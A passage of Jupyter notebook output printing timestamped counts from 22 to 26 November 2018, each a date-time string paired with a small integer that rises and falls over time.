"['2018-11-22 18:20:21.387195', 12]\n",
"['2018-11-22 18:20:29.093670', 13]\n",
"['2018-11-22 18:20:40.352122', 14]\n",
"['2018-11-22 18:20:43.735997', 15]\n",
"['2018-11-22 18:20:54.859545', 16]\n",
"['2018-11-22 18:21:13.693987', 17]\n",
"['2018-11-22 18:21:14.423522', 18]\n",
"['2018-11-22 18:21:21.982541', 19]\n",
"['2018-11-22 18:21:29.576354', 20]\n",
"['2018-11-22 18:22:21.416002', 19]\n",
"['2018-11-22 18:22:52.405120', 18]\n",
"['2018-11-22 18:23:23.469307', 16]\n",
"['2018-11-22 18:23:23.677324', 17]\n",
"['2018-11-22 18:23:40.639147', 18]\n",
"['2018-11-22 18:23:56.983511', 19]\n",
"['2018-11-22 18:24:04.075823', 18]\n",
"['2018-11-22 18:24:34.086421', 17]\n",
"['2018-11-22 18:24:49.093796', 15]\n",
"['2018-11-22 18:25:00.812340', 14]\n",
"['2018-11-22 18:25:19.125607', 13]\n",
"['2018-11-22 18:25:27.675933', 14]\n",
"['2018-11-22 18:25:29.874939', 15]\n",
"['2018-11-22 18:25:38.266293', 16]\n",
"['2018-11-22 18:25:53.276310', 15]\n",
"['2018-11-22 18:26:34.250076', 14]\n",
"['2018-11-22 18:27:49.213279', 13]\n",
"['2018-11-22 18:27:58.836361', 12]\n",
"['2018-11-22 18:30:40.299238', 11]\n",
"['2018-11-22 18:30:42.755042', 10]\n",
"['2018-11-22 18:31:17.352729', 11]\n",
"['2018-11-22 18:31:59.801072', 10]\n",
"['2018-11-22 18:32:10.375599', 9]\n",
"['2018-11-22 18:34:42.837183', 8]\n",
"['2018-11-22 18:35:25.533486', 7]\n",
"['2018-11-22 18:36:10.557853', 6]\n",
"['2018-11-22 18:37:14.452743', 7]\n",
"['2018-11-22 18:39:45.686713', 6]\n",
"['2018-11-22 18:41:00.798261', 7]\n",
"['2018-11-22 18:42:21.835875', 6]\n",
"['2018-11-22 18:42:53.702583', 5]\n",
"['2018-11-22 18:45:29.648038', 4]\n",
"['2018-11-22 18:46:01.701784', 3]\n",
"['2018-11-22 18:49:52.641427', 4]\n",
"['2018-11-22 18:50:14.188133', 5]\n",
"['2018-11-22 18:50:43.926220', 6]\n",
"['2018-11-22 18:52:07.281068', 7]\n",
"['2018-11-22 18:52:13.431539', 8]\n",
"['2018-11-22 18:53:38.464588', 9]\n",
"['2018-11-22 18:53:47.692698', 8]\n",
"['2018-11-22 18:53:57.442108', 7]\n",
"['2018-11-22 18:55:16.711529', 6]\n",
"['2018-11-22 18:56:08.711485', 5]\n",
"['2018-11-22 18:58:44.608935', 6]\n",
"['2018-11-22 18:59:11.199613', 7]\n",
"['2018-11-22 18:59:17.199400', 8]\n",
"['2018-11-22 19:00:21.738599', 9]\n",
"['2018-11-22 19:01:09.110631', 10]\n",
"['2018-11-22 19:01:24.950780', 11]\n",
"['2018-11-22 19:02:35.027901', 10]\n",
"['2018-11-22 19:02:51.016742', 9]\n",
"['2018-11-22 19:02:59.938443', 8]\n",
"['2018-11-22 19:04:34.941095', 7]\n",
"['2018-11-22 19:08:16.499885', 8]\n",
"['2018-11-22 19:12:40.694528', 9]\n",
"['2018-11-22 19:13:58.532065', 7]\n",
"['2018-11-22 19:14:25.010452', 8]\n",
"['2018-11-22 19:14:56.507880', 9]\n",
"['2018-11-22 19:15:09.613844', 8]\n",
"['2018-11-22 19:16:41.755741', 9]\n",
"['2018-11-22 19:18:58.122554', 8]\n",
"['2018-11-22 19:20:43.425045', 7]\n",
"['2018-11-22 19:21:08.854149', 6]\n",
"['2018-11-22 19:21:18.817837', 7]\n",
"['2018-11-22 19:22:28.522269', 8]\n",
"['2018-11-22 19:22:37.453456', 7]\n",
"['2018-11-22 19:23:23.908983', 6]\n",
"['2018-11-22 19:24:29.343046', 7]\n",
"['2018-11-22 19:26:04.588922', 8]\n",
"['2018-11-22 19:28:37.898707', 9]\n",
"['2018-11-22 19:28:47.969536', 10]\n",
"['2018-11-22 19:28:48.728816', 11]\n",
"['2018-11-22 19:28:54.920755', 12]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 19:29:46.371547', 13]\n",
"['2018-11-22 19:29:58.066911', 12]\n",
"['2018-11-22 19:30:22.685317', 13]\n",
"['2018-11-22 19:30:45.064670', 14]\n",
"['2018-11-22 19:31:09.584639', 15]\n",
"['2018-11-22 19:31:21.737430', 16]\n",
"['2018-11-22 19:31:28.227680', 17]\n",
"['2018-11-22 19:31:37.861657', 18]\n",
"['2018-11-22 19:32:50.964652', 15]\n",
"['2018-11-22 19:33:01.819367', 14]\n",
"['2018-11-22 19:33:15.539778', 15]\n",
"['2018-11-22 19:34:24.335190', 16]\n",
"['2018-11-22 19:34:39.337498', 15]\n",
"['2018-11-22 19:34:49.281157', 16]\n",
"['2018-11-22 19:35:09.949366', 14]\n",
"['2018-11-22 19:35:22.006716', 13]\n",
"['2018-11-22 19:35:30.038380', 10]\n",
"['2018-11-22 19:35:39.919885', 11]\n",
"['2018-11-22 19:35:56.095916', 9]\n",
"['2018-11-22 19:36:19.936115', 8]\n",
"['2018-11-22 19:37:00.466528', 7]\n",
"['2018-11-22 19:38:58.233102', 5]\n",
"['2018-11-22 19:44:36.198930', 2]\n",
"['2018-11-22 20:11:30.311228', 3]\n",
"['2018-11-22 20:14:29.482292', 4]\n",
"['2018-11-22 20:15:32.419818', 5]\n",
"['2018-11-22 20:15:48.036882', 6]\n",
"['2018-11-22 20:15:59.115957', 7]\n",
"['2018-11-22 20:16:11.842190', 8]\n",
"['2018-11-22 20:16:18.980391', 9]\n",
"['2018-11-22 20:17:04.925697', 10]\n",
"['2018-11-22 20:18:43.617302', 11]\n",
"['2018-11-22 20:18:49.250804', 10]\n",
"['2018-11-22 20:20:01.887268', 8]\n",
"['2018-11-22 20:22:16.928889', 5]\n",
"['2018-11-22 20:23:25.379067', 3]\n",
"['2018-11-22 20:24:02.130092', 2]\n",
"['2018-11-22 20:25:41.079806', 3]\n",
"['2018-11-22 20:33:45.424210', 2]\n",
"['2018-11-22 20:35:19.863106', 3]\n",
"['2018-11-22 20:40:30.758489', 4]\n",
"['2018-11-22 20:42:59.703809', 3]\n",
"['2018-11-22 20:46:04.413127', 4]\n",
"['2018-11-22 20:46:56.860799', 5]\n",
"['2018-11-22 20:48:12.267346', 6]\n",
"['2018-11-22 20:50:12.824916', 4]\n",
"['2018-11-22 20:50:52.012266', 3]\n",
"['2018-11-22 20:57:31.039116', 2]\n",
"['2018-11-22 21:01:50.868913', 3]\n",
"['2018-11-22 21:02:50.650755', 4]\n",
"['2018-11-22 21:05:29.105635', 5]\n",
"['2018-11-22 21:05:49.573555', 6]\n",
"['2018-11-22 21:05:52.440901', 5]\n",
"['2018-11-22 21:06:38.864547', 6]\n",
"['2018-11-22 21:06:39.076432', 7]\n",
"['2018-11-22 21:06:55.850325', 8]\n",
"['2018-11-22 21:07:40.885424', 6]\n",
"['2018-11-22 21:09:31.268656', 7]\n",
"['2018-11-22 21:14:21.467218', 2]\n",
"['2018-11-22 21:14:25.675684', 3]\n",
"['2018-11-25 05:48:08.007354', 2]\n",
"['2018-11-25 05:50:05.686788', 3]\n",
"['2018-11-25 06:02:32.022005', 2]\n",
"['2018-11-25 06:04:16.480700', 3]\n",
"['2018-11-25 06:12:16.585270', 2]\n",
"['2018-11-25 06:16:00.854645', 3]\n",
"['2018-11-25 06:20:30.457831', 4]\n",
"['2018-11-25 07:21:43.355492', 2]\n",
"['2018-11-25 07:22:15.127483', 3]\n",
"['2018-11-25 07:28:51.863331', 2]\n",
"['2018-11-25 07:31:38.728957', 3]\n",
"['2018-11-25 07:32:52.622922', 4]\n",
"['2018-11-25 07:32:53.110510', 5]\n",
"['2018-11-25 07:34:15.504383', 6]\n",
"['2018-11-25 07:36:06.001620', 5]\n",
"['2018-11-25 07:38:00.478905', 4]\n",
"['2018-11-25 07:39:20.270221', 5]\n",
"['2018-11-25 07:40:29.230784', 6]\n",
"['2018-11-25 07:43:43.224835', 5]\n",
"['2018-11-25 07:45:29.809443', 6]\n",
"['2018-11-25 07:49:31.184603', 5]\n",
"['2018-11-25 07:51:05.010852', 6]\n",
"['2018-11-25 07:52:31.182782', 7]\n",
"['2018-11-25 07:54:56.952495', 8]\n",
"['2018-11-25 07:54:59.413633', 9]\n",
"['2018-11-25 07:55:20.779319', 8]\n",
"['2018-11-25 07:55:39.077836', 9]\n",
"['2018-11-25 07:55:45.055855', 8]\n",
"['2018-11-25 07:58:24.510190', 9]\n",
"['2018-11-25 07:59:11.152973', 7]\n",
"['2018-11-25 08:00:17.340533', 6]\n",
"['2018-11-25 08:00:37.629724', 7]\n",
"['2018-11-25 08:01:34.563607', 8]\n",
"['2018-11-25 08:02:11.485165', 9]\n",
"['2018-11-25 08:04:34.038261', 8]\n",
"['2018-11-25 08:04:38.995233', 7]\n",
"['2018-11-25 08:05:04.002780', 6]\n",
"['2018-11-25 08:05:24.000752', 4]\n",
"['2018-11-25 08:05:38.020568', 3]\n",
"['2018-11-25 08:18:49.061387', 2]\n",
"['2018-11-25 08:26:39.843937', 3]\n",
"['2018-11-25 08:29:22.451131', 4]\n",
"['2018-11-25 08:32:22.493155', 2]\n",
"['2018-11-25 08:33:16.789894', 3]\n",
"['2018-11-25 08:43:18.140141', 4]\n",
"['2018-11-25 08:44:22.480326', 5]\n",
"['2018-11-25 08:47:17.338177', 4]\n",
"['2018-11-25 08:49:28.594145', 5]\n",
"['2018-11-25 08:49:37.022724', 6]\n",
"['2018-11-25 08:49:41.717983', 7]\n",
"['2018-11-25 08:49:46.704170', 8]\n",
"['2018-11-25 08:49:55.612597', 9]\n",
"['2018-11-25 08:51:04.110498', 10]\n",
"['2018-11-25 08:51:54.228781', 11]\n",
"['2018-11-25 08:51:57.711201', 12]\n",
"['2018-11-25 08:52:03.074492', 13]\n",
"['2018-11-25 08:52:36.313152', 14]\n",
"['2018-11-25 08:53:55.050860', 12]\n",
"['2018-11-25 08:54:05.725979', 13]\n",
"['2018-11-25 08:54:53.799637', 12]\n",
"['2018-11-25 08:55:25.252468', 11]\n",
"['2018-11-25 08:55:47.720251', 10]\n",
"['2018-11-25 08:55:56.833355', 11]\n",
"['2018-11-25 08:55:57.991562', 10]\n",
"['2018-11-25 08:56:09.163859', 8]\n",
"['2018-11-25 08:57:40.077398', 9]\n",
"['2018-11-25 08:58:04.666613', 10]\n",
"['2018-11-25 08:58:11.340796', 9]\n",
"['2018-11-25 08:59:22.662508', 10]\n",
"['2018-11-25 09:00:04.939113', 11]\n",
"['2018-11-25 09:00:13.825617', 12]\n",
"['2018-11-25 09:01:26.290097', 11]\n",
"['2018-11-25 09:01:57.163931', 10]\n",
"['2018-11-25 09:02:31.668446', 8]\n",
"['2018-11-25 09:02:44.252840', 9]\n",
"['2018-11-25 09:03:30.988487', 8]\n",
"['2018-11-25 09:04:06.225217', 7]\n",
"['2018-11-25 09:06:11.582399', 8]\n",
"['2018-11-25 09:09:34.280089', 9]\n",
"['2018-11-25 09:10:12.055927', 8]\n",
"['2018-11-25 09:12:43.226409', 6]\n",
"['2018-11-25 09:26:08.477536', 2]\n",
"['2018-11-25 09:39:37.000823', 3]\n",
"['2018-11-25 09:40:41.160762', 4]\n",
"['2018-11-25 09:41:11.020965', 5]\n",
"['2018-11-25 09:44:10.782581', 6]\n",
"['2018-11-25 09:45:46.093484', 5]\n",
"['2018-11-25 09:46:15.958487', 6]\n",
"['2018-11-25 09:46:18.500218', 7]\n",
"['2018-11-25 09:48:00.779530', 8]\n",
"['2018-11-25 09:48:09.091718', 9]\n",
"['2018-11-25 09:48:20.952987', 8]\n",
"['2018-11-25 09:51:28.288519', 7]\n",
"['2018-11-25 09:52:04.475040', 8]\n",
"['2018-11-25 09:52:32.897410', 9]\n",
"['2018-11-25 09:52:48.199470', 10]\n",
"['2018-11-25 09:53:11.054127', 11]\n",
"['2018-11-25 09:53:21.505205', 12]\n",
"['2018-11-25 09:54:19.652629', 10]\n",
"['2018-11-25 09:55:35.654188', 9]\n",
"['2018-11-25 09:56:57.968331', 10]\n",
"['2018-11-25 09:57:52.227466', 9]\n",
"['2018-11-25 09:57:52.740498', 10]\n",
"['2018-11-25 09:57:59.510190', 11]\n",
"['2018-11-25 09:58:10.178785', 12]\n",
"['2018-11-25 09:58:11.138703', 13]\n",
"['2018-11-25 09:59:02.389135', 12]\n",
"['2018-11-25 09:59:23.972477', 11]\n",
"['2018-11-25 10:00:28.822314', 12]\n",
"['2018-11-25 10:00:45.992623', 13]\n",
"['2018-11-25 10:01:04.101956', 12]\n",
"['2018-11-25 10:02:20.421956', 11]\n",
"['2018-11-25 10:02:31.690857', 10]\n",
"['2018-11-25 10:02:52.055215', 9]\n",
"['2018-11-25 10:03:00.035658', 8]\n",
"['2018-11-25 10:03:18.513101', 9]\n",
"['2018-11-25 10:03:31.339442', 8]\n",
"['2018-11-25 10:09:05.212171', 2]\n",
"['2018-11-25 10:27:35.564085', 3]\n",
"['2018-11-25 10:37:15.757690', 2]\n",
"['2018-11-25 10:48:30.508976', 3]\n",
"['2018-11-25 10:48:30.903010', 4]\n",
"['2018-11-25 10:48:38.386436', 5]\n",
"['2018-11-25 10:48:58.671973', 6]\n",
"['2018-11-25 10:49:25.694846', 7]\n",
"['2018-11-25 10:49:32.033282', 8]\n",
"['2018-11-25 10:50:30.940314', 9]\n",
"['2018-11-25 10:53:02.744111', 10]\n",
"['2018-11-25 10:55:45.999134', 4]\n",
"['2018-11-25 10:58:55.732432', 5]\n",
"['2018-11-25 11:34:35.235237', 2]\n",
"['2018-11-25 11:44:33.334359', 3]\n",
"['2018-11-25 11:50:27.234236', 4]\n",
"['2018-11-25 11:50:37.999478', 3]\n",
"['2018-11-25 11:51:15.285628', 4]\n",
"['2018-11-25 11:51:48.165670', 5]\n",
"['2018-11-25 11:51:50.868033', 6]\n",
"['2018-11-25 11:53:41.319448', 7]\n",
"['2018-11-25 11:55:05.138127', 8]\n",
"['2018-11-25 11:58:32.597283', 3]\n",
"['2018-11-25 11:58:34.251223', 4]\n",
"['2018-11-25 11:59:21.675811', 3]\n",
"['2018-11-25 12:02:01.304959', 4]\n",
"['2018-11-25 12:06:10.767524', 2]\n",
"['2018-11-25 12:07:48.172917', 3]\n",
"['2018-11-25 12:17:50.314915', 2]\n",
"['2018-11-25 12:36:10.633480', 3]\n",
"['2018-11-25 12:44:42.920444', 4]\n",
"['2018-11-25 12:46:12.297800', 5]\n",
"['2018-11-25 12:46:16.600861', 6]\n",
"['2018-11-25 12:46:25.580643', 7]\n",
"['2018-11-25 12:46:36.988088', 8]\n",
"['2018-11-25 12:46:43.853998', 9]\n",
"['2018-11-25 12:47:02.757530', 10]\n",
"['2018-11-25 12:48:27.758868', 11]\n",
"['2018-11-25 12:49:26.432658', 12]\n",
"['2018-11-25 12:50:54.480788', 11]\n",
"['2018-11-25 12:51:54.311211', 12]\n",
"['2018-11-25 12:51:58.885119', 13]\n",
"['2018-11-25 12:52:06.507224', 14]\n",
"['2018-11-25 12:52:23.194904', 15]\n",
"['2018-11-25 12:52:28.520488', 14]\n",
"['2018-11-25 12:52:54.816462', 15]\n",
"['2018-11-25 12:53:19.461680', 14]\n",
"['2018-11-25 12:53:28.923527', 12]\n",
"['2018-11-25 12:53:50.107341', 11]\n",
"['2018-11-25 12:54:00.283162', 12]\n",
"['2018-11-25 12:54:04.103582', 11]\n",
"['2018-11-25 12:54:19.078466', 10]\n",
"['2018-11-25 12:55:27.823958', 11]\n",
"['2018-11-25 12:55:39.844661', 12]\n",
"['2018-11-25 12:55:58.910504', 11]\n",
"['2018-11-25 12:56:05.207767', 12]\n",
"['2018-11-25 12:56:26.519521', 11]\n",
"['2018-11-25 12:57:34.863074', 12]\n",
"['2018-11-25 12:58:14.002832', 11]\n",
"['2018-11-25 12:59:30.334402', 9]\n",
"['2018-11-25 12:59:36.343569', 8]\n",
"['2018-11-25 12:59:41.001154', 9]\n",
"['2018-11-25 13:00:09.696076', 8]\n",
"['2018-11-25 13:01:17.289526', 9]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 13:03:15.964789', 7]\n",
"['2018-11-25 13:04:13.394999', 3]\n",
"['2018-11-25 13:06:39.631738', 4]\n",
"['2018-11-25 13:11:07.074468', 3]\n",
"['2018-11-25 13:18:43.247270', 2]\n",
"['2018-11-25 13:31:59.601377', 3]\n",
"['2018-11-25 13:40:13.734501', 2]\n",
"['2018-11-25 13:40:24.220923', 3]\n",
"['2018-11-25 13:41:18.836631', 4]\n",
"['2018-11-25 13:43:32.368381', 5]\n",
"['2018-11-25 13:45:11.797263', 6]\n",
"['2018-11-25 13:46:03.374674', 7]\n",
"['2018-11-25 13:47:37.432631', 6]\n",
"['2018-11-25 13:48:38.925202', 5]\n",
"['2018-11-25 13:52:03.961160', 6]\n",
"['2018-11-25 13:54:38.019377', 5]\n",
"['2018-11-25 13:54:54.133969', 6]\n",
"['2018-11-25 13:58:11.731808', 5]\n",
"['2018-11-25 13:59:03.978864', 4]\n",
"['2018-11-25 13:59:06.492618', 5]\n",
"['2018-11-25 13:59:39.811620', 6]\n",
"['2018-11-25 13:59:40.872786', 7]\n",
"['2018-11-25 14:00:39.663305', 8]\n",
"['2018-11-25 14:00:57.691597', 9]\n",
"['2018-11-25 14:01:12.051750', 10]\n",
"['2018-11-25 14:03:49.586733', 7]\n",
"['2018-11-25 14:05:11.383864', 6]\n",
"['2018-11-25 14:10:34.939162', 2]\n",
"['2018-11-25 14:38:51.295590', 3]\n",
"['2018-11-25 14:39:20.264402', 4]\n",
"['2018-11-25 14:40:22.936849', 5]\n",
"['2018-11-25 14:41:25.862150', 6]\n",
"['2018-11-25 14:42:05.265082', 7]\n",
"['2018-11-25 14:43:45.572633', 8]\n",
"['2018-11-25 14:44:47.337488', 9]\n",
"['2018-11-25 14:45:18.914702', 10]\n",
"['2018-11-25 14:45:24.876593', 11]\n",
"['2018-11-25 14:45:40.097370', 12]\n",
"['2018-11-25 14:46:23.816567', 13]\n",
"['2018-11-25 14:46:26.394133', 14]\n",
"['2018-11-25 14:47:26.408625', 15]\n",
"['2018-11-25 14:47:38.614264', 14]\n",
"['2018-11-25 14:47:48.770509', 13]\n",
"['2018-11-25 14:48:07.861145', 14]\n",
"['2018-11-25 14:49:17.522679', 13]\n",
"['2018-11-25 14:49:39.040543', 12]\n",
"['2018-11-25 14:50:14.813459', 10]\n",
"['2018-11-25 14:50:21.045884', 9]\n",
"['2018-11-25 14:50:38.460062', 7]\n",
"['2018-11-25 14:50:46.693097', 8]\n",
"['2018-11-25 14:51:02.749436', 7]\n",
"['2018-11-25 14:51:27.941949', 8]\n",
"['2018-11-25 14:52:53.064802', 7]\n",
"['2018-11-25 14:52:57.619145', 8]\n",
"['2018-11-25 14:53:30.134411', 9]\n",
"['2018-11-25 14:53:49.670555', 8]\n",
"['2018-11-25 14:54:05.341721', 9]\n",
"['2018-11-25 14:55:10.018105', 8]\n",
"['2018-11-25 14:55:51.487218', 7]\n",
"['2018-11-25 14:58:38.621091', 5]\n",
"['2018-11-25 14:59:22.203304', 3]\n",
"['2018-11-25 15:02:26.369485', 4]\n",
"['2018-11-25 15:35:34.427048', 2]\n",
"['2018-11-25 15:39:36.562398', 3]\n",
"['2018-11-25 15:44:23.200088', 2]\n",
"['2018-11-25 15:48:05.404327', 3]\n",
"['2018-11-25 15:49:22.293270', 4]\n",
"['2018-11-25 15:50:09.268664', 5]\n",
"['2018-11-25 15:51:31.004868', 6]\n",
"['2018-11-25 15:51:57.390691', 7]\n",
"['2018-11-25 15:52:18.145631', 6]\n",
"['2018-11-25 15:53:36.996697', 7]\n",
"['2018-11-25 15:53:55.428695', 8]\n",
"['2018-11-25 15:54:09.891769', 9]\n",
"['2018-11-25 15:54:23.535938', 10]\n",
"['2018-11-25 15:54:27.163672', 11]\n",
"['2018-11-25 15:56:03.080487', 10]\n",
"['2018-11-25 15:56:48.064757', 9]\n",
"['2018-11-25 15:56:49.052400', 10]\n",
"['2018-11-25 15:56:49.800971', 11]\n",
"['2018-11-25 15:56:51.540519', 12]\n",
"['2018-11-25 15:57:51.386687', 13]\n",
"['2018-11-25 15:58:22.988858', 12]\n",
"['2018-11-25 15:59:23.722766', 10]\n",
"['2018-11-25 15:59:59.735823', 11]\n",
"['2018-11-25 16:00:14.736055', 10]\n",
"['2018-11-25 16:00:31.196425', 11]\n",
"['2018-11-25 16:01:00.591552', 9]\n",
"['2018-11-25 16:01:54.626553', 6]\n",
"['2018-11-25 16:03:31.566057', 5]\n",
"['2018-11-25 16:04:31.739478', 4]\n",
"['2018-11-25 16:05:39.464132', 2]\n",
"['2018-11-25 16:45:14.198520', 3]\n",
"['2018-11-25 16:45:47.791079', 4]\n",
"['2018-11-25 16:46:00.198124', 5]\n",
"['2018-11-25 16:46:50.873788', 6]\n",
"['2018-11-25 16:47:27.039932', 7]\n",
"['2018-11-25 16:48:33.576555', 6]\n",
"['2018-11-25 16:50:24.486878', 7]\n",
"['2018-11-25 16:50:30.770456', 8]\n",
"['2018-11-25 16:51:04.139431', 7]\n",
"['2018-11-25 16:51:42.854057', 5]\n",
"['2018-11-25 16:51:53.461958', 6]\n",
"['2018-11-25 16:52:15.617686', 7]\n",
"['2018-11-25 16:53:03.851368', 8]\n",
"['2018-11-25 16:54:23.542455', 9]\n",
"['2018-11-25 16:55:05.480918', 10]\n",
"['2018-11-25 16:55:12.638209', 9]\n",
"['2018-11-25 16:56:27.724922', 6]\n",
"['2018-11-25 16:58:36.271154', 4]\n",
"['2018-11-25 17:00:44.216355', 2]\n",
"['2018-11-25 17:04:15.535459', 3]\n",
"['2018-11-25 17:17:17.190481', 2]\n",
"['2018-11-25 17:20:14.077408', 3]\n",
"['2018-11-25 17:26:00.765978', 4]\n",
"['2018-11-25 17:28:33.921652', 3]\n",
"['2018-11-25 17:30:11.273696', 4]\n",
"['2018-11-25 17:36:16.550833', 5]\n",
"['2018-11-25 17:38:18.882768', 6]\n",
"['2018-11-25 17:38:41.998947', 7]\n",
"['2018-11-25 17:40:00.121230', 8]\n",
"['2018-11-25 17:42:17.720381', 7]\n",
"['2018-11-25 17:42:25.731189', 6]\n",
"['2018-11-25 17:43:43.840789', 5]\n",
"['2018-11-25 17:47:53.180339', 6]\n",
"['2018-11-25 17:50:19.909624', 7]\n",
"['2018-11-25 17:50:38.867995', 8]\n",
"['2018-11-25 17:51:03.685097', 9]\n",
"['2018-11-25 17:51:24.995883', 10]\n",
"['2018-11-25 17:51:26.358448', 11]\n",
"['2018-11-25 17:51:28.796752', 12]\n",
"['2018-11-25 17:51:35.370944', 13]\n",
"['2018-11-25 17:51:50.102982', 12]\n",
"['2018-11-25 17:52:01.450040', 13]\n",
"['2018-11-25 17:52:02.073178', 14]\n",
"['2018-11-25 17:52:16.080762', 13]\n",
"['2018-11-25 17:53:59.689090', 12]\n",
"['2018-11-25 17:53:59.957100', 13]\n",
"['2018-11-25 17:54:18.023564', 14]\n",
"['2018-11-25 17:54:49.586596', 15]\n",
"['2018-11-25 17:55:28.783605', 16]\n",
"['2018-11-25 17:55:48.527028', 17]\n",
"['2018-11-25 17:55:49.488911', 18]\n",
"['2018-11-25 17:56:22.516706', 17]\n",
"['2018-11-25 17:56:54.492708', 16]\n",
"['2018-11-25 17:58:21.200791', 15]\n",
"['2018-11-25 17:58:29.040856', 16]\n",
"['2018-11-25 17:58:33.402268', 17]\n",
"['2018-11-25 17:59:18.616100', 16]\n",
"['2018-11-25 17:59:19.811840', 17]\n",
"['2018-11-25 17:59:30.707491', 15]\n",
"['2018-11-25 17:59:38.250280', 16]\n",
"['2018-11-25 17:59:43.779494', 17]\n",
"['2018-11-25 17:59:56.267300', 15]\n",
"['2018-11-25 18:00:13.794133', 14]\n",
"['2018-11-25 18:00:46.496098', 13]\n",
"['2018-11-25 18:00:50.873461', 14]\n",
"['2018-11-25 18:01:27.936744', 15]\n",
"['2018-11-25 18:02:19.857573', 16]\n",
"['2018-11-25 18:02:29.860509', 15]\n",
"['2018-11-25 18:02:34.857575', 14]\n",
"['2018-11-25 18:03:21.771338', 13]\n",
"['2018-11-25 18:03:51.930278', 11]\n",
"['2018-11-25 18:04:13.242147', 10]\n",
"['2018-11-25 18:04:21.992600', 9]\n",
"['2018-11-25 18:05:00.636407', 8]\n",
"['2018-11-25 18:05:32.999389', 7]\n",
"['2018-11-25 18:07:00.779187', 6]\n",
"['2018-11-25 18:08:05.397180', 7]\n",
"['2018-11-25 18:08:34.146984', 6]\n",
"['2018-11-25 18:10:11.364978', 5]\n",
"['2018-11-25 18:10:35.324664', 4]\n",
"['2018-11-25 18:19:20.427080', 2]\n",
"['2018-11-25 18:31:13.182407', 3]\n",
"['2018-11-25 18:32:19.729625', 4]\n",
"['2018-11-25 18:34:21.522573', 3]\n",
"['2018-11-25 18:35:22.626915', 2]\n",
"['2018-11-25 18:35:33.669287', 3]\n",
"['2018-11-25 18:38:32.280582', 4]\n",
"['2018-11-25 18:40:34.268806', 3]\n",
"['2018-11-25 18:42:45.238881', 4]\n",
"['2018-11-25 18:42:54.063597', 5]\n",
"['2018-11-25 18:43:10.844880', 6]\n",
"['2018-11-25 18:43:52.707384', 7]\n",
"['2018-11-25 18:44:24.162965', 8]\n",
"['2018-11-25 18:46:25.893745', 7]\n",
"['2018-11-25 18:47:40.365660', 8]\n",
"['2018-11-25 18:47:53.444204', 9]\n",
"['2018-11-25 18:48:02.711612', 10]\n",
"['2018-11-25 18:48:17.290853', 11]\n",
"['2018-11-25 18:48:25.842640', 10]\n",
"['2018-11-25 18:48:44.507481', 9]\n",
"['2018-11-25 18:48:52.717379', 10]\n",
"['2018-11-25 18:49:15.448403', 9]\n",
"['2018-11-25 18:49:35.196925', 10]\n",
"['2018-11-25 18:51:04.262672', 9]\n",
"['2018-11-25 18:51:07.690343', 10]\n",
"['2018-11-25 18:51:31.737028', 11]\n",
"['2018-11-25 18:52:03.288977', 10]\n",
"['2018-11-25 18:52:19.138538', 9]\n",
"['2018-11-25 18:52:35.060072', 8]\n",
"['2018-11-25 18:52:50.888321', 7]\n",
"['2018-11-25 18:52:53.126070', 8]\n",
"['2018-11-25 18:53:00.961090', 9]\n",
"['2018-11-25 18:53:17.751994', 8]\n",
"['2018-11-25 18:54:33.002052', 7]\n",
"['2018-11-25 18:55:51.955865', 6]\n",
"['2018-11-25 18:56:19.717544', 5]\n",
"['2018-11-25 18:56:59.387487', 4]\n",
"['2018-11-25 18:57:15.153598', 3]\n",
"['2018-11-25 18:59:37.005272', 2]\n",
"['2018-11-25 19:01:07.961527', 3]\n",
"['2018-11-25 19:05:21.420094', 2]\n",
"['2018-11-25 19:39:29.303132', 3]\n",
"['2018-11-25 19:42:53.003458', 4]\n",
"['2018-11-25 19:43:49.361230', 3]\n",
"['2018-11-25 19:49:00.397936', 2]\n",
"['2018-11-25 19:49:02.863583', 3]\n",
"['2018-11-25 19:50:05.679368', 4]\n",
"['2018-11-25 19:51:27.149903', 5]\n",
"['2018-11-25 19:51:29.414310', 6]\n",
"['2018-11-25 19:52:41.924532', 7]\n",
"['2018-11-25 19:52:58.632928', 8]\n",
"['2018-11-25 19:53:26.003327', 9]\n",
"['2018-11-25 19:53:41.354538', 8]\n",
"['2018-11-25 19:54:31.480483', 7]\n",
"['2018-11-25 19:55:13.029677', 8]\n",
"['2018-11-25 19:55:40.174924', 6]\n",
"['2018-11-25 19:56:21.960236', 7]\n",
"['2018-11-25 19:56:53.385371', 8]\n",
"['2018-11-25 19:57:19.223098', 7]\n",
"['2018-11-25 19:57:27.075870', 8]\n",
"['2018-11-25 19:58:16.800934', 9]\n",
"['2018-11-25 19:58:50.008537', 10]\n",
"['2018-11-25 19:59:34.058258', 11]\n",
"['2018-11-25 20:00:09.493370', 12]\n",
"['2018-11-25 20:00:10.888474', 13]\n",
"['2018-11-25 20:01:10.888520', 10]\n",
"['2018-11-25 20:01:47.339750', 9]\n",
"['2018-11-25 20:02:05.141672', 8]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 20:03:42.829027', 7]\n",
"['2018-11-25 20:04:01.770491', 8]\n",
"['2018-11-25 20:05:22.839742', 6]\n",
"['2018-11-25 20:06:02.803354', 5]\n",
"['2018-11-25 20:08:25.871751', 3]\n",
"['2018-11-25 20:09:18.034806', 4]\n",
"['2018-11-25 20:12:13.276265', 3]\n",
"['2018-11-25 20:37:28.559666', 2]\n",
"['2018-11-25 20:37:42.749358', 3]\n",
"['2018-11-25 20:42:45.048446', 2]\n",
"['2018-11-25 20:44:32.980717', 3]\n",
"['2018-11-25 20:48:04.447586', 4]\n",
"['2018-11-25 20:51:49.622578', 5]\n",
"['2018-11-25 20:52:27.953632', 4]\n",
"['2018-11-25 20:53:05.751835', 5]\n",
"['2018-11-25 21:00:58.769214', 2]\n",
"['2018-11-25 21:32:37.535269', 3]\n",
"['2018-11-25 21:46:49.508322', 2]\n",
"['2018-11-25 21:51:39.435945', 3]\n",
"['2018-11-25 21:51:45.452736', 2]\n",
"['2018-11-25 21:53:27.541489', 3]\n",
"['2018-11-25 21:53:52.426385', 4]\n",
"['2018-11-25 21:54:07.655820', 5]\n",
"['2018-11-25 21:54:34.542388', 6]\n",
"['2018-11-25 21:55:17.620493', 7]\n",
"['2018-11-25 21:55:28.057876', 8]\n",
"['2018-11-25 21:57:25.715539', 9]\n",
"['2018-11-25 22:02:23.037508', 2]\n",
"['2018-11-25 22:02:25.777150', 3]\n",
"['2018-11-26 04:39:38.760464', 2]\n",
"['2018-11-26 04:44:54.314861', 3]\n",
"['2018-11-26 04:53:26.893312', 2]\n",
"['2018-11-26 06:00:46.746105', 3]\n",
